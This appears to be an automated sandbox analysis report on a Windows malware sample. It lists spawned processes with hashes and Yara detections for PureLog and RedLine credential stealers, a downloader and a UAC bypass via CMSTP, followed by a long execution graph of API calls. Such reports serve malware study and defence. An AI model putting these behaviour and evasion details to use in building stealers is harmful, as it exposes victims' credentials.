                                                                                                                                                                                                                                                                                      Start time:09:28:19
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                                                      Start time:09:28:19
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\u3z0.1.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\u3z0.1.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      File size:4'866'096 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.2257557220.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 4%, ReversingLabs
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                                                      Start time:09:28:21
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1124
                                                                                                                                                                                                                                                                                      Imagebase:0xe10000
                                                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                                      Start time:09:28:31
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 2188
                                                                                                                                                                                                                                                                                      Imagebase:0xe10000
                                                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                                                                      Start time:09:28:38
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      Imagebase:0xe70000
                                                                                                                                                                                                                                                                                      File size:262'432 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                                                      Start time:09:28:39
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                                                                                                                                                                                                                                                                                      Imagebase:0x13e31d50000
                                                                                                                                                                                                                                                                                      File size:59'721'128 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:8E9C467EAC35B35DA1F586014F29C330
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000000.2454770621.0000013E34F8B000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000000.2454770621.0000013E31D8B000.00000002.00000001.01000000.00000017.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                                                                      Start time:09:28:40
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0xf60000
                                                                                                                                                                                                                                                                                      File size:2'469'936 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2531256823.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                      Start time:09:28:41
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Imagebase:0x790000
                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2752594150.0000000004DC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2752907263.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2752907263.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                                                      Start time:09:28:41
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                                                                      Start time:09:29:02
                                                                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      Imagebase:0x5f0000
                                                                                                                                                                                                                                                                                      File size:262'432 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3282767064.0000000000ABB000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:5.4%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:2.4%
                                                                                                                                                                                                                                                                                        Signature Coverage:10.8%
                                                                                                                                                                                                                                                                                        Total number of Nodes:1173
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:17
                                                                                                                                                                                                                                                                                        execution_graph 44495 42edafe 44496 42edb0d 44495->44496 44499 42ee29e 44496->44499 44500 42ee2b9 44499->44500 44501 42ee2c2 CreateToolhelp32Snapshot 44500->44501 44502 42ee2de Module32First 44500->44502 44501->44500 44501->44502 44503 42ee2ed 44502->44503 44504 42edb16 44502->44504 44506 42edf5d 44503->44506 44507 42edf88 44506->44507 44508 42edf99 VirtualAlloc 44507->44508 44509 42edfd1 44507->44509 44508->44509 44509->44509 44510 408273 44512 40828f 44510->44512 44511 4082ce 44516 4082d5 44511->44516 44520 40831c 44511->44520 44512->44511 44514 40831c std::_Xfsopen 29 API calls 44512->44514 44517 4082db 44512->44517 44514->44511 44516->44517 44526 40e228 44516->44526 44539 411d32 44520->44539 44522 4082ee 44522->44517 44523 4106ef 44522->44523 44600 41049b 44523->44600 44525 410705 44525->44516 44527 40e234 __FrameHandler3::FrameUnwindToState 44526->44527 44528 40e245 44527->44528 44529 40e25a 44527->44529 44698 412381 20 API calls __Strcoll 44528->44698 44538 40e255 __fread_nolock _Xfiopen 44529->44538 44681 40e81d EnterCriticalSection 44529->44681 44532 40e24a 44699 410905 26 API calls _Deallocate 44532->44699 44534 40e276 44682 40e1b2 44534->44682 44536 40e281 44700 40e29e LeaveCriticalSection _Xfiopen 44536->44700 44538->44517 44541 411c71 __FrameHandler3::FrameUnwindToState 44539->44541 44540 411c8b 44564 412381 20 API calls __Strcoll 44540->44564 44541->44540 44543 411cb8 44541->44543 44545 411cca 44543->44545 44546 411cbd 44543->44546 44544 411c90 44565 410905 26 API calls _Deallocate 44544->44565 44556 416499 44545->44556 44566 412381 20 API calls __Strcoll 44546->44566 44550 411cd3 44551 411ce7 std::_Xfsopen 44550->44551 44552 411cda 44550->44552 44568 411d1b LeaveCriticalSection _Xfiopen 44551->44568 44567 412381 20 API calls __Strcoll 44552->44567 44553 411c9b __fread_nolock 44553->44522 44557 4164a5 __FrameHandler3::FrameUnwindToState 44556->44557 44569 411a06 EnterCriticalSection 44557->44569 44559 4164b3 44570 416533 44559->44570 44563 4164e4 __fread_nolock 44563->44550 44564->44544 44565->44553 44566->44553 44567->44553 44568->44553 44569->44559 44577 416556 44570->44577 44571 4164c0 44584 4164ef 44571->44584 44572 4165af 44589 41704e 20 API calls 3 library calls 44572->44589 44574 4165b8 44590 41629a 44574->44590 44577->44571 44577->44572 44587 40e81d EnterCriticalSection 44577->44587 44588 40e831 LeaveCriticalSection 44577->44588 44578 4165c1 44578->44571 44596 4175b5 11 API calls 2 library calls 44578->44596 44580 4165e0 44597 40e81d EnterCriticalSection 44580->44597 44583 4165f3 44583->44571 44599 411a4e LeaveCriticalSection 44584->44599 44586 4164f6 44586->44563 44587->44577 44588->44577 44589->44574 44591 4162a5 RtlFreeHeap 44590->44591 44595 4162ce _free 44590->44595 44592 4162ba 44591->44592 44591->44595 44598 412381 20 API calls __Strcoll 44592->44598 44594 4162c0 GetLastError 44594->44595 44595->44578 44596->44580 44597->44583 44598->44594 44599->44586 44604 4104a7 __FrameHandler3::FrameUnwindToState 44600->44604 44601 4104b3 44625 412381 20 API calls __Strcoll 44601->44625 44603 4104d9 44613 40e81d EnterCriticalSection 44603->44613 44604->44601 44604->44603 44605 4104b8 44626 410905 26 API calls _Deallocate 44605->44626 44608 4104e5 44614 4105fb 44608->44614 44610 4104c3 __fread_nolock 44610->44525 44611 4104f9 44627 410518 LeaveCriticalSection _Xfiopen 44611->44627 44613->44608 44615 41061d 44614->44615 44616 41060d 44614->44616 44628 410522 44615->44628 44641 412381 20 API calls __Strcoll 44616->44641 44619 410612 44619->44611 44620 4106bf 44620->44611 44621 410640 _Xfiopen 44621->44620 44632 40dfcb 44621->44632 44625->44605 44626->44610 44627->44610 44629 410535 44628->44629 44631 41052e _Xfiopen 44628->44631 44630 419800 __fread_nolock 28 API calls 44629->44630 44629->44631 44630->44631 44631->44621 44633 40dfe3 44632->44633 44637 40dfdf 44632->44637 44633->44637 44642 4154e8 44633->44642 44635 40e003 44649 415fa3 62 API calls 7 library calls 44635->44649 44638 419800 44637->44638 44652 419767 44638->44652 44641->44619 44643 4154f4 44642->44643 44644 415509 44642->44644 44650 412381 20 API calls __Strcoll 44643->44650 44644->44635 44646 4154f9 44651 410905 26 API calls _Deallocate 44646->44651 44648 415504 44648->44635 44649->44637 44650->44646 44651->44648 44661 41e97a 44652->44661 44654 419779 44655 419781 44654->44655 44656 419792 SetFilePointerEx 44654->44656 44674 412381 20 API calls __Strcoll 44655->44674 44658 4197aa GetLastError 44656->44658 44660 419786 44656->44660 44675 41234b 20 API calls 3 library calls 44658->44675 44660->44620 44662 41e987 44661->44662 44663 41e99c 44661->44663 44676 41236e 20 API calls __Strcoll 44662->44676 44667 41e9c1 44663->44667 44678 41236e 20 API calls __Strcoll 44663->44678 44666 41e98c 44677 412381 20 API calls __Strcoll 44666->44677 44667->44654 44668 41e9cc 44679 412381 20 API calls __Strcoll 44668->44679 44671 41e994 44671->44654 44672 41e9d4 44680 410905 26 API calls _Deallocate 44672->44680 44674->44660 44675->44660 44676->44666 44677->44671 44678->44668 44679->44672 44680->44671 44681->44534 44683 40e1bf 44682->44683 44684 40e1d4 44682->44684 44720 412381 20 API calls __Strcoll 44683->44720 44687 40dfcb _Xfiopen 62 API calls 44684->44687 44690 40e1cf _Xfiopen 44684->44690 44686 40e1c4 44721 410905 26 API calls _Deallocate 44686->44721 44689 40e1e8 44687->44689 44701 4165f6 44689->44701 44690->44536 44693 4154e8 _Xfiopen 26 API calls 44694 40e1f6 44693->44694 44705 41637e 44694->44705 44697 41629a _free 20 API calls 44697->44690 44698->44532 44699->44538 44700->44538 44702 40e1f0 44701->44702 44703 41660c 44701->44703 44702->44693 44703->44702 44704 41629a _free 20 API calls 44703->44704 44704->44702 44706 4163a2 44705->44706 44707 41638d 44705->44707 44709 4163dd 44706->44709 44714 4163c9 44706->44714 44725 41236e 20 API calls __Strcoll 44707->44725 44727 41236e 20 API calls __Strcoll 44709->44727 44710 416392 44726 412381 20 API calls __Strcoll 44710->44726 44712 4163e2 44728 412381 20 API calls __Strcoll 44712->44728 44722 416356 44714->44722 44717 4163ea 44729 410905 26 API calls _Deallocate 44717->44729 44718 40e1fc 44718->44690 44718->44697 44720->44686 44721->44690 44730 4162d4 44722->44730 44724 41637a 44724->44718 44725->44710 44726->44718 44727->44712 44728->44717 44729->44718 44731 4162e0 __FrameHandler3::FrameUnwindToState 44730->44731 44741 41e6fd EnterCriticalSection 44731->44741 44733 4162ee 44734 416320 44733->44734 44735 416315 44733->44735 44757 412381 20 API calls __Strcoll 44734->44757 44742 4163fd 44735->44742 44738 41631b 44758 41634a LeaveCriticalSection __wsopen_s 44738->44758 44740 41633d __fread_nolock 44740->44724 44741->44733 44743 41e97a __wsopen_s 26 API calls 44742->44743 44746 41640d 44743->44746 44744 416413 44759 41e8e9 21 API calls 3 library calls 44744->44759 44746->44744 44748 41e97a __wsopen_s 26 API calls 44746->44748 44756 416445 44746->44756 44747 41646b 44750 41648d 44747->44750 44760 41234b 20 API calls 3 library calls 44747->44760 44751 41643c 44748->44751 44749 41e97a __wsopen_s 26 API calls 44752 416451 FindCloseChangeNotification 44749->44752 44750->44738 44754 41e97a __wsopen_s 26 API calls 44751->44754 44752->44744 44755 41645d GetLastError 44752->44755 44754->44756 44755->44744 44756->44744 44756->44749 44757->44738 44758->44740 44759->44747 44760->44750 44761 416ec2 44762 416ee7 44761->44762 44763 416ecf 44761->44763 44767 416f42 44762->44767 44775 416edf 44762->44775 44813 418c55 21 API calls 2 library calls 44762->44813 44811 412381 20 API calls __Strcoll 44763->44811 44765 416ed4 44812 410905 26 API calls _Deallocate 44765->44812 44769 4154e8 _Xfiopen 26 API calls 44767->44769 44770 416f5a 44769->44770 44781 41919a 44770->44781 44772 416f61 44773 4154e8 _Xfiopen 26 API calls 44772->44773 44772->44775 44774 416f8d 44773->44774 44774->44775 44776 4154e8 _Xfiopen 26 API calls 44774->44776 44777 416f9b 44776->44777 44777->44775 44778 4154e8 _Xfiopen 26 API calls 44777->44778 44779 416fab 44778->44779 44780 4154e8 _Xfiopen 26 API calls 44779->44780 44780->44775 44782 4191a6 __FrameHandler3::FrameUnwindToState 44781->44782 44783 4191c6 44782->44783 44784 4191ae 44782->44784 44786 41928c 44783->44786 44790 4191ff 44783->44790 44880 41236e 20 API calls __Strcoll 44784->44880 44887 41236e 20 API calls __Strcoll 44786->44887 44787 4191b3 44881 412381 20 API calls __Strcoll 44787->44881 44794 419223 44790->44794 44795 41920e 44790->44795 44791 419291 44888 412381 20 API calls __Strcoll 44791->44888 44793 4191bb __fread_nolock 44793->44772 44814 41e6fd EnterCriticalSection 44794->44814 44882 41236e 20 API calls __Strcoll 44795->44882 44798 419229 44800 419245 44798->44800 44801 41925a 44798->44801 44799 419213 44883 412381 20 API calls __Strcoll 44799->44883 44884 412381 20 API calls __Strcoll 44800->44884 44815 4192ad 44801->44815 44806 41921b 44889 410905 26 API calls _Deallocate 44806->44889 44807 41924a 44885 41236e 20 API calls __Strcoll 44807->44885 44808 419255 44886 419284 LeaveCriticalSection __wsopen_s 44808->44886 44811->44765 44812->44775 44813->44767 44814->44798 44816 4192d7 44815->44816 44817 4192bf 44815->44817 44819 419641 44816->44819 44824 41931c 44816->44824 44899 41236e 20 API calls __Strcoll 44817->44899 44920 41236e 20 API calls __Strcoll 44819->44920 44820 4192c4 44900 412381 20 API calls __Strcoll 44820->44900 44823 419646 44921 412381 20 API calls __Strcoll 44823->44921 44825 4192cc 44824->44825 44827 419327 44824->44827 44831 419357 44824->44831 44825->44808 44901 41236e 20 API calls __Strcoll 44827->44901 44828 419334 44922 410905 26 API calls _Deallocate 44828->44922 44830 41932c 44902 412381 20 API calls __Strcoll 44830->44902 44834 419370 44831->44834 44835 4193b2 44831->44835 44836 419396 44831->44836 44834->44836 44867 41937d 44834->44867 44906 417a45 44835->44906 44903 41236e 20 API calls __Strcoll 44836->44903 44839 41939b 44904 412381 20 API calls __Strcoll 44839->44904 44843 41629a _free 20 API calls 44846 4193d2 44843->44846 44844 41951b 44847 419591 44844->44847 44851 419534 GetConsoleMode 44844->44851 44845 4193a2 44905 410905 26 API calls _Deallocate 44845->44905 44849 41629a _free 20 API calls 44846->44849 44850 419595 ReadFile 44847->44850 44853 4193d9 44849->44853 44854 419609 GetLastError 44850->44854 44855 4195af 44850->44855 44851->44847 44852 419545 44851->44852 44852->44850 44856 41954b ReadConsoleW 44852->44856 44857 4193e3 44853->44857 44858 4193fe 44853->44858 44859 419616 44854->44859 44860 41956d 44854->44860 44855->44854 44861 419586 44855->44861 44856->44861 44862 419567 GetLastError 44856->44862 44913 412381 20 API calls __Strcoll 44857->44913 44866 419800 __fread_nolock 28 API calls 44858->44866 44918 412381 20 API calls __Strcoll 44859->44918 44877 4193ad __fread_nolock 44860->44877 44915 41234b 20 API calls 3 library calls 44860->44915 44872 4195d4 44861->44872 44873 4195eb 44861->44873 44861->44877 44862->44860 44863 41629a _free 20 API calls 44863->44825 44866->44867 44890 421229 44867->44890 44869 4193e8 44914 41236e 20 API calls __Strcoll 44869->44914 44870 41961b 44919 41236e 20 API calls __Strcoll 44870->44919 44916 418fc9 31 API calls 3 library calls 44872->44916 44876 419602 44873->44876 44873->44877 44917 418e09 29 API calls __fread_nolock 44876->44917 44877->44863 44879 419607 44879->44877 44880->44787 44881->44793 44882->44799 44883->44806 44884->44807 44885->44808 44886->44793 44887->44791 44888->44806 44889->44793 44891 421243 44890->44891 44892 421236 44890->44892 44894 42124f 44891->44894 44924 412381 20 API calls __Strcoll 44891->44924 44923 412381 20 API calls __Strcoll 44892->44923 44894->44844 44896 42123b 44896->44844 44897 421270 44925 410905 26 API calls _Deallocate 44897->44925 44899->44820 44900->44825 44901->44830 44902->44828 44903->44839 44904->44845 44905->44877 44907 417a83 44906->44907 44911 417a53 FindHandler 44906->44911 44927 412381 20 API calls __Strcoll 44907->44927 44908 417a6e RtlAllocateHeap 44910 417a81 44908->44910 44908->44911 44910->44843 44911->44907 44911->44908 44926 412ede 7 API calls 2 library calls 44911->44926 44913->44869 44914->44877 44915->44877 44916->44877 44917->44879 44918->44870 44919->44877 44920->44823 44921->44828 44922->44825 44923->44896 44924->44897 44925->44896 44926->44911 44927->44910 44928 409385 44929 409391 __FrameHandler3::FrameUnwindToState 44928->44929 44960 40959e 44929->44960 44931 409398 44932 4094eb 44931->44932 44935 4093c2 44931->44935 45064 409a73 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 44932->45064 44934 4094f2 45052 413b51 44934->45052 44947 409401 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 44935->44947 45055 413876 5 API calls ___crtLCMapStringA 44935->45055 44940 4093db 44942 4093e1 44940->44942 45056 41381a 44940->45056 44944 409462 44971 409b8d 44944->44971 44947->44944 45060 40e677 39 API calls 4 library calls 44947->45060 44961 4095a7 44960->44961 45066 409d1b IsProcessorFeaturePresent 44961->45066 44963 4095b3 45067 40c907 10 API calls 3 library calls 44963->45067 44965 4095b8 44970 4095bc 44965->44970 45068 415329 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 44965->45068 44967 4095c5 44968 4095d3 44967->44968 45069 40c930 8 API calls 3 library calls 44967->45069 44968->44931 44970->44931 45070 40b5a0 44971->45070 44974 409468 44975 4137c7 44974->44975 45072 41e1c1 44975->45072 44977 4137d0 44978 409471 44977->44978 45076 41e4cb 38 API calls 44977->45076 44980 424b3e 44978->44980 44981 424b4e _Xfiopen 44980->44981 45078 401b1e 44981->45078 44983 424b7c 45081 403498 44983->45081 44988 401b1e 27 API calls 44989 424bdc 44988->44989 45088 426354 44989->45088 44992 401b1e 27 API calls 44993 424bf5 GetModuleFileNameA 44992->44993 44994 401b1e 27 API calls 44993->44994 44995 424c1f 44994->44995 45108 425ee2 44995->45108 44997 424c2f 44998 401b1e 27 API calls 44997->44998 44999 4250ca 44998->44999 45127 4034e3 44999->45127 45001 4250f4 45135 426504 45001->45135 45003 425233 45197 42612f 45003->45197 45005 4253f6 45006 401b1e 27 API calls 45005->45006 45007 4255c2 45006->45007 45211 40356f 45007->45211 45009 4255df 45010 426504 64 API calls 45009->45010 45011 425666 45010->45011 45012 426504 64 API calls 45011->45012 45016 425840 ___scrt_fastfail 45012->45016 45013 425e40 45240 4019f8 26 API calls 45013->45240 45016->45013 45219 410c91 45016->45219 45020 42586d 45227 426217 CreateFileA 45020->45227 45024 401b1e 27 API calls 45025 4258a7 45024->45025 45230 426260 45025->45230 45028 4258ac 45029 426504 64 API calls 45028->45029 45030 425ac4 ___scrt_fastfail 45029->45030 45035 425bbf 45030->45035 45237 42631a GetTempPathA 45030->45237 45032 425b8e 45033 426217 3 API calls 45032->45033 45034 425ba3 45033->45034 45034->45035 45036 401b1e 27 API calls 45034->45036 45039 426504 64 API calls 45035->45039 45037 425bba 45036->45037 45038 426260 29 API calls 45037->45038 45038->45035 45041 425db5 ___scrt_fastfail 45039->45041 45043 410c91 51 API calls 45041->45043 45048 425e1b 45041->45048 45045 425ddf 45043->45045 45046 426217 3 API calls 45045->45046 45047 425dfd 45046->45047 45047->45048 45049 401b1e 27 API calls 45047->45049 45239 4019f8 26 API calls 45048->45239 45050 425e16 45049->45050 45051 426260 29 API calls 45050->45051 45051->45048 45714 4138ce 45052->45714 45055->44940 45057 413849 45056->45057 45058 4097a5 ___crtLCMapStringA 5 API calls 45057->45058 45059 413872 45058->45059 45059->44947 45060->44944 45064->44934 45066->44963 45067->44965 45068->44967 45069->44970 45071 409ba0 GetStartupInfoW 45070->45071 45071->44974 45073 41e1ca 45072->45073 45074 41e1d3 45072->45074 45077 41e0c0 51 API calls 5 library calls 45073->45077 45074->44977 45076->44977 45077->45074 45241 402c50 45078->45241 45082 4034c0 45081->45082 45083 4034d9 45081->45083 45082->45083 45250 40e509 46 API calls 45082->45250 45085 401b52 45083->45085 45251 402d13 45085->45251 45087 401b68 45087->44988 45089 42635e __EH_prolog 45088->45089 45282 403e0c 45089->45282 45091 426382 45091->45091 45092 402c71 27 API calls 45091->45092 45093 4263e7 45092->45093 45296 404097 45093->45296 45095 426496 45099 4264b2 std::ios_base::_Ios_base_dtor 45095->45099 45313 40387f 26 API calls 2 library calls 45095->45313 45098 42646e 45102 402c50 27 API calls 45098->45102 45309 402bef 45099->45309 45100 402c71 27 API calls 45100->45098 45104 